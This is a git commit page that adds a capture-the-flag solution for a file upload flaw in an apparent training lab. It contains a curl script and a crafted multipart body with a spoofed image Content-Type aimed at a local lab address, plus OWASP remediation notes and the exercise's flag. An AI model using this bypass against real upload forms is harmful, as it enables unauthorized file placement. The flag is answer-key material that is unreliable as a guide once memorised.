diff options
| author | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 15:43:45 +0100 |
|---|---|---|
| committer | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 15:43:45 +0100 |
| commit | 642f809226c9e25c22c3c97ee12dadfda945f17a (patch) | |
| tree | ec120b0f3f06229db45cb20269bd03e5e212aa4c /Upload malicious file | |
| parent | 9441ee608adee6b4f1c98cc990fbb55d0f132232 (diff) | |
| download | darkly-642f809226c9e25c22c3c97ee12dadfda945f17a.tar.gz darkly-642f809226c9e25c22c3c97ee12dadfda945f17a.zip | |
Add malicious file upload solution
Diffstat (limited to 'Upload malicious file')
| -rw-r--r-- | Upload malicious file/Resources/notes.md | 13 | ||||
| -rwxr-xr-x | Upload malicious file/Resources/upload.bash | 6 | ||||
| -rw-r--r-- | Upload malicious file/Resources/yourMom.exe | 15 | ||||
| -rw-r--r-- | Upload malicious file/flag | 1 |
4 files changed, 35 insertions, 0 deletions
diff --git a/Upload malicious file/Resources/notes.md b/Upload malicious file/Resources/notes.md new file mode 100644 index 0000000..98f0a85 --- /dev/null +++ b/Upload malicious file/Resources/notes.md @@ -0,0 +1,13 @@ +## Exploit + +1. In the page to upload images there is no input validation of files uploaded by the user beyond checking for the `Content-Type` header. +1. Upload `yourMom.exe` with `upload.bash`. It will be accepted and the flag printed. + +## Fix + +- [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files]() +- [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types?utm_source=chatgpt.com]() + +Input validation for file is very complicated but should go beyond only checking the `Content-Type` header, for example the file extension, or the file content (magic pattern, content pattern etc). Here is a more complete [cheatsheet for file upload from OWASP](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html). + +Even legitimate files might have malicious content! diff --git a/Upload malicious file/Resources/upload.bash b/Upload malicious file/Resources/upload.bash new file mode 100755 index 0000000..46b90fc --- /dev/null +++ b/Upload malicious file/Resources/upload.bash @@ -0,0 +1,6 @@ +#!/usr/bin/bash + +curl --silent -X POST \ + 'http://10.0.2.15/?page=upload' \ + --header "Content-Type: multipart/form-data; boundary=----BOUNDARY" \ + --data-binary @yourMom.exe | grep flag diff --git a/Upload malicious file/Resources/yourMom.exe b/Upload malicious file/Resources/yourMom.exe new file mode 100644 index 0000000..e6af3fb --- /dev/null +++ b/Upload malicious file/Resources/yourMom.exe @@ -0,0 +1,15 @@ +------BOUNDARY +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +100000 +------BOUNDARY +Content-Disposition: form-data; name="uploaded"; filename="yourMom.exe" +Content-Type: image/jpeg + +"Your moms a hoe!" + +------BOUNDARY +Content-Disposition: form-data; name="Upload" + +Upload +------BOUNDARY-- diff --git a/Upload malicious file/flag b/Upload malicious file/flag new file mode 100644 index 0000000..1599a1d --- /dev/null +++ b/Upload malicious file/flag @@ -0,0 +1 @@ +46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8 |